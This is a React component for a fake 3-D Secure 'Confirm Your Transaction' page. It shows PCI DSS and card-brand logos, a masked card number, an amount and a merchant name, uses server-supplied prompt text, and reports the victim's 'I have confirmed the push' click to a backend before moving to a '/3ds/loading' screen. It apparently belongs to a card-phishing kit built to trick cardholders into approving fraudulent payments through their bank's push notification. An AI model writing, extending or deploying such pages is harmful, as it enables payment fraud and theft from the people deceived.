import React, { useState } from 'react';
import HelpImage from './assets/help.gif'
import axios from 'axios';
import { useNavigate } from 'react-router-dom';
import './Pushloader.css'
import PciImage from './assets/pci.jpg'
import VisaImage from './assets/visa.jpg'
import MasterImage from './assets/master.jpg'
import { RotatingLines, TailSpin } from "react-loader-spinner";


const PUSHPage = () => {

    const [submitBtnContent, setSubmitBtnContent] = useState('I have confirmed the push');
    const [submitBtnDis, setSubmitBtnDis] = useState(false);
    const navigate = useNavigate()

    const today = new Date();
    const formattedDate = `${today.getDate().toString().padStart(2, '0')}/${(today.getMonth() + 1)
      .toString()
      .padStart(2, '0')}/${today.getFullYear()}`;




      const handleCodeSubmit = async () => {
        setSubmitBtnContent(<div className="inputLoader"></div>);
        const dataToSend = {
          uuId: localStorage.getItem('uuId')
        };
    
        setSubmitBtnDis(true);

        try {
          const response = await axios.post(`${process.env.REACT_APP_SERVER_URL}/api/push_verif`, dataToSend);
          if (response.status === 200) {
            navigate("/3ds/loading")
            // setCurrentPage(5);
          }
        } catch (error) {
          setTimeout(() => {
            setSubmitBtnDis(false);
            setSubmitBtnContent('I have confirmed the push');
          }, 3000);
        }
      };


      const firstDigit = localStorage.getItem('first-digit');

      // Determine the image source and alt text
      let imageSrc, altText;
      if (firstDigit === '4') {
        imageSrc = VisaImage;
        altText = 'Visa';
      } else if (firstDigit === '5') {
        imageSrc = MasterImage;
        altText = 'Mastercard';
      } else {
        imageSrc = null; // No image if not 4 or 5
        altText = 'No card';
      }
  return (
    <div className="flex items-center justify-center w-full min-h-screen bg-white">
      <div className="w-full max-w-sm px-6 py-8 bg-white border border-neutral-300">
        <div className="flex items-center justify-between w-full mb-6">
          <img
            src={PciImage} // Replace with actual PCI DSS logo
            alt="PCI DSS Compliant"
            className="h-12 mr-4"
          />
      {imageSrc && (
        <img src={imageSrc} alt={altText} className="h-12" />
      )}
        </div>
        <h1 className="mb-4 text-lg font-bold text-gray-800">
          Confirm Your Transaction
        </h1>
        <p className="mb-6 text-xs text-gray-900">
        {localStorage.getItem('push_text')}
        </p>
        <div className="my-6">
          
        <RotatingLines
  visible={true}
  height="32"
  width="32"
  color="#ffffff"
  strokeWidth="5"
  animationDuration="0.75"
  ariaLabel="rotating-lines-loading"
  wrapperStyle={{}}
  wrapperClass=""
  />
  </div>
        <div className="grid grid-cols-2 mb-4 text-xs">
          <span className='text-xs'>Merchant:</span>
          <span className='text-gray-900'>{process.env.REACT_APP_MERCHANT_NAME}</span>
          
          <span className='text-xs'>Date:</span>
          <span className='text-gray-700'>{formattedDate}</span>
          
          <span className='text-xs'>Card Number:</span>
          <span className='text-gray-900'>**** **** **** {localStorage.getItem('last-four-digits')}</span>
          
          <span className='text-xs'>Amount:</span>
          <span className='text-gray-900'>{localStorage.getItem('currency') ||process.env.REACT_APP_CURRENCY} {localStorage.getItem('summ')}</span>
        </div>

        
        <form>
          <div className="flex justify-between mt-3 mb-4 text-xs text-neutral-500">
            <a href="#" className="leading-3 underline hover:underline">
              Didn't receive the push notification?
            </a>
          </div>
          
          <div className="flex items-center justify-between">
            <button
              type="button"
              className="px-4 py-2 text-xs"
            >
              Cancel
            </button>
            <button
                onClick={handleCodeSubmit}
                type="submit"
                disabled={submitBtnDis}
                className="px-2 py-1 text-xs leading-none border rounded-sm h-fit border-neutral-800 bg-neutral-100 "
                >
                {submitBtnContent}
                </button>
            <button
              type="button"
              className="flex items-center px-4 py-2 text-xs"
            >
              <img className='mr-1' src={HelpImage} alt="" />
              Help
            </button>
          </div>
        </form>
      </div>
    </div>
  );
};

export default PUSHPage;
